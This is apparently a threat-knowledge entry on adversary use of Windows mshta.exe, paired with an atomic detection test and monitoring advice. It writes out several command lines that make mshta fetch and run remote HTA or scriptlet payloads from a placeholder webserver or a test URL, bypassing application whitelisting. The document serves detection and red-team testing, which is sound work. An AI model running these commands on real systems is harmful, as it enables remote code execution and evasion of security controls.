Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension.hta. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)
Files may be executed by mshta.exe through an inline script:
mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))They may also be executed directly from URLs:
mshta http[:]//webserver/payload[.]htaMshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: GitHub SubTee The List)
Detection: Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the binary being executed.
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious.
Platforms: Windows
Data Sources: Process monitoring, Process command-line parameters
Defense Bypassed: Application whitelisting
Permissions Required: User
Remote Support: No
Contributors: Ricardo Dias, Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
Test execution of a remote script using mshta.exe
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/mshta.sct |
mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();